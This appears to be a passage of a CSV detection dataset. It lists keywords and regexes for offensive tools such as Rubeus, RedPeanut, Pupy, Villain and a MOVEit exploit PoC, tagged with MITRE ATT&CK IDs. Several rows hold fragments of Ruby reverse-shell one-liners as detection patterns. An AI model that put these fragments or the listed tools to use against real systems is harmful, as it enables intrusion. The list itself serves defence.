"*rubber_ducky.py*",".{0,1000}rubber_ducky\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Rubeus createnetonly *",".{0,1000}Rubeus\screatenetonly\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Rubeus*currentluid*",".{0,1000}Rubeus.{0,1000}currentluid.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Rubeus*harvest*",".{0,1000}Rubeus.{0,1000}harvest.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Rubeus*logonsession*",".{0,1000}Rubeus.{0,1000}logonsession.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Rubeus*monitor*",".{0,1000}Rubeus.{0,1000}monitor.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Rubeus.bin*",".{0,1000}Rubeus\.bin.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*Rubeus.Commands*",".{0,1000}Rubeus\.Commands.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Rubeus.exe *",".{0,1000}Rubeus\.exe\s.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*Rubeus.exe*",".{0,1000}Rubeus\.exe.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Rubeus.exe*",".{0,1000}Rubeus\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Rubeus.git*",".{0,1000}Rubeus\.git.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Rubeus.Kerberos*",".{0,1000}Rubeus\.Kerberos.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Rubeus.lib*",".{0,1000}Rubeus\.lib.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*rubeus.txt*",".{0,1000}rubeus\.txt.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusAskTgtMenu*",".{0,1000}RubeusAskTgtMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusASREPRoastManager*",".{0,1000}RubeusASREPRoastManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusChangePwManager*",".{0,1000}RubeusChangePwManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusCreateNetOnlyManager*",".{0,1000}RubeusCreateNetOnlyManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusDescribeManager*",".{0,1000}RubeusDescribeManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusDumpManager*",".{0,1000}RubeusDumpManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusDumpMenu*",".{0,1000}RubeusDumpMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusHarvestManager*",".{0,1000}RubeusHarvestManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusHarvestMenu*",".{0,1000}RubeusHarvestMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusHashManager*",".{0,1000}RubeusHashManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusKerberoastManager*",".{0,1000}RubeusKerberoastManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusKerberoastMenu*",".{0,1000}RubeusKerberoastMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusKlistManager*",".{0,1000}RubeusKlistManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusManager*",".{0,1000}RubeusManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Rubeus-master*",".{0,1000}Rubeus\-master.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*RubeusMonitorManager*",".{0,1000}RubeusMonitorManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusMonitorMenu*",".{0,1000}RubeusMonitorMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusPttManager*",".{0,1000}RubeusPttManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusPttMenu*",".{0,1000}RubeusPttMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusPurgeManager*",".{0,1000}RubeusPurgeManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusPurgeMenu*",".{0,1000}RubeusPurgeMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusRenewManager*",".{0,1000}RubeusRenewManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusRenewMenu*",".{0,1000}RubeusRenewMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusS4UManager*",".{0,1000}RubeusS4UManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusS4UMenu*",".{0,1000}RubeusS4UMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusTgtDelegManager*",".{0,1000}RubeusTgtDelegManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusTgtDelegMenu*",".{0,1000}RubeusTgtDelegMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusTriageManager*",".{0,1000}RubeusTriageManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*ruby CVE-202*-*.rb *",".{0,1000}ruby\sCVE\-202.{0,1000}\-.{0,1000}\.rb\s.{0,1000}","offensive_tool_keyword","POC","CVE-2023-34362: MOVEit Transfer Unauthenticated RCE","T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003","TA0005 - TA0001 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sfewer-r7/CVE-2023-34362","1","0","N/A","N/A","1","62","23","2024-03-24T00:46:38Z","2023-06-12T12:56:12Z" "*ruby poc-cve-202*-*.rb*",".{0,1000}ruby\spoc\-cve\-202.{0,1000}\-.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","POC","CVE-2023-34362: MOVEit Transfer Unauthenticated RCE","T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003","TA0005 - TA0001 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sfewer-r7/CVE-2023-34362","1","0","N/A","N/A","1","62","23","2024-03-24T00:46:38Z","2023-06-12T12:56:12Z" "*ruby -rsocket -e*TCPSocket.new*loop*gets*chomp*IO.popen*read*",".{0,1000}ruby\s\-rsocket\s\-e.{0,1000}TCPSocket\.new.{0,1000}loop.{0,1000}gets.{0,1000}chomp.{0,1000}IO\.popen.{0,1000}read.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ruby -rsocket -e'spawn(""/bin/bash"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""\/bin\/bash\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ruby -rsocket -e'spawn(""/bin/sh"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""\/bin\/sh\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ruby -rsocket -e'spawn(""bash"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""bash\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ruby -rsocket -e'spawn(""cmd"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""cmd\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ruby -rsocket -e'spawn(""powershell"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""powershell\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ruby -rsocket -e'spawn(""pwsh"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""pwsh\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ruby -rsocket -e'spawn(""sh"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""sh\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ruby -rsocket -e'spawn(""zsh"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""zsh\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ruby_nntpd_cmd_exec*",".{0,1000}ruby_nntpd_cmd_exec.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*ruby_no_sh_reverse_tcp.py*",".{0,1000}ruby_no_sh_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*ruby_reverse_tcp.py*",".{0,1000}ruby_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 